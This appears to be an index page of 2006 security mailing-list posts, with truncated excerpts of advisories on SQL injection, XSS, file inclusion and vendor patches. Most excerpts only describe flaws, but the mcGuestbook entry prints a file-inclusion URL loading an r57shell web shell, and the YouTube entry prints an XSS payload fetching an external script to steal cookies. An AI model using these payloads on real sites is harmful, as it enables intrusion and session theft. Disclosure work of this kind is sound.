dvdwolf SQL injection/XSS

= Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Brh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r = Example:-

[USN-303-1] MySQL vulnerability

=== Ubuntu Security Notice USN-303-1 June 16, 2006 mysql-dfsg-4.1, mysql-dfsg-5.0 vulnerability CVE-2006-2753 === A security issue affects the following Ubuntu releases:

Boardhost.com - XSS

Boardhost.com Description: Free Msgboard hosting service. Homepage: http://www.Boardhost.com Affected files Input boxes of posting a message Searching for a listing board - XSS vuln with cookie disclosure when posting a msg (Tested on

[security bulletin] HPSBUX02115 SSRT061077 rev.1 - HP-UX running Support Tools Manager (xstm, cstm, stm) Local Denial of Service (DoS)

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00657001 Version: 1 HPSBUX02115 SSRT061077 rev.1 - HP-UX running Support Tools Manager (xstm, cstm, stm) Local Denial of Service (DoS) NOTICE: The information in this Security Bulletin

Develooping Flash Chat (banned_file) Remote File Inclusion

## # Develooping Flash Chat (banned_file) Remote File Inclusion ## # Credit : SpC-x # Site : http://wWw.SaVSaK.CoM ## # Greetz : # |

Indexu v 5.0.01 Multiple Remote File Include Vulnerabilities

Discovered By CrAsh_oVeR_rIdE indexu remote file include -- site of script:http://www.nicecoder.com/ - Vulnerable: INDEXU v5.0.1 file include include($admin_template_path.msg.php); admin_template_path

Re: Several flaws in e-business designer (eBD)

A Bug in the eBD HTML editor has been discovered. It will allow an user to modify the images of the /imgfiles folder (the files raised in the option resources images). Oasyssoft, the producer, has installed the patch in all our servers, so all MyeBD users are updated since the end of may.

aXentForum II XSS vuLLn

vendor:http://www.axent.us/axentforum.cfm affected versions:aXentForum II and prior aXentForum II contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the startrow parameter in viewposts.cfm isn't properly sanitised before being returned to the user. This can be

file include exploits in nucleus 3.23

Multiple file include exploits in nucleus 3.23 script type : nucleus 3.23 bug found by : sweet-devil team : site-down type : file include exploits : action.php

Chatizens.com - XSS with cookie disclosure

Chatizens.com Also known as Chattown.com Homepage: http://www.chatizens.com Affected files: * Profile input boxes: All input boxes of your profile. * Browsing the forums XSS vuln with cookie disclosure via profile input boxes. To bypass

Calendarix 0.7.20060401, SQL Injection Vulnerabilities

- Advisory id: FSA:018 Author:Federico Fazzi Date: 15/06/2006, 23:36 Sinthesis: Calendarix 0.7.20060401, SQL Injection Vulnerabilities Type: low Product: http://www.calendarix.com/ Patch: unavailable

Ji-takz Chat (mycfg) Remote File Inclusion

## # Ji-takz Chat (mycfg) Remote File Inclusion ## # Credit : SpC-x # Site : http://wWw.SaVSaK.CoM ## # Greetz : # | Liz0ziM | Ejder |

Zeroboard File Upload extension bypass Vulnerability

Zeroboard File Upload extension bypass Vulnerability Author : Choi Min-sung (mins __at__ wins21.com) Product : Zeroboard http://www.nzeo.com Verndor-Patches : Unpatched Impact : remote code execution Summary === Basically, the PHP, HTML, and CGI files are prohibited to upload in

Cisco Secure ACS Cross Site Scripting Vulnerability.

FUJITSU SERVICES SECURITY ADVISORY DATE: 27-01-2006 AUTHOR: THOMAS LIAM ROMANIS VENDOR: Cisco PRODUCT: Cisco Secure ACS VERSION(S) TESTED: Cisco Secure ACS version 2.3 UNIX hosted on Netscape FastTrack Server version 2.01c on Sun Solaris 8.0 TITLE: Cisco Secure ACS LogonProxy.cgi Cross Site

Blacksingles.com - XSS cookie disclosure

Blacksingles.com Homepage: http://www.blacksingles.com Affected files Profile input boxes Add a friend input box. list.html view.html reply.html compose.html - XSS vuln with cookie disclosure via the Location box. User data isn't

file include exploits in mcGuestbook 1.3

Multiple file include exploits in mcGuestbook 1.3 script type : mcGuestbook 1.3 bug found by : sweet-devil team : site-down type : file include exploits : admin.php http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt?

PHP security (or the lack thereof)

From my own mail archives, PHP appears to make up at least 4% of the email to bugtraq I see - or over 1000 issues since 1995, out of the 25,000 I have saved. People complain about applications like sendmail...in the same period, it has been resopnsible for less than 200. Do we have a new

PictureDis Products lang Parameter File Inclusion Vulnerability

** PictureDis Products lang Parameter File Inclusion Vulnerability = Input passed to the lang parameter in thumstbl.php, wpfiles.php, and

[ MDKSA-2006:106 ] - Updated mdkkdm packages fix local vulnerability

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:106 http://www.mandriva.com/security/

Re: [Bugtraq ID: 17909] ISPConfig Session.INC.PHP Remote File Include Vulnerability

The Exploit with Bugtraq ID: 17909 has been researched by the developers of the ISPConfig webhosting controlpanel. The result is that no ISPConfig 2.2.2 installation is vulnerable to this reported exploit. Explanation: 1) The exploit expects a file (session.inc.php) to be in the webroot, but

Youtube.com - XSS cookie disclosure

Youtube.com Homepage: http://www.youtube.com Affected files: * Search box input * Adding a new blog: - Blog name XSS Vuln with cookie disclosure via search box: Data isn't sanatized when using the search box. For PoC input: script src=http://www.youfucktard.com/xss.js/script PoC

Bingbox.com - XSS cookie disclosure

Bingbox.com Homepage: http://www.bingbox.com Affected files: * Profile input boxes: - City input * Registering * Viewing Birthdays * Adding a friend * Viewing people online --- XSS with cookie disclosure via inviting friends: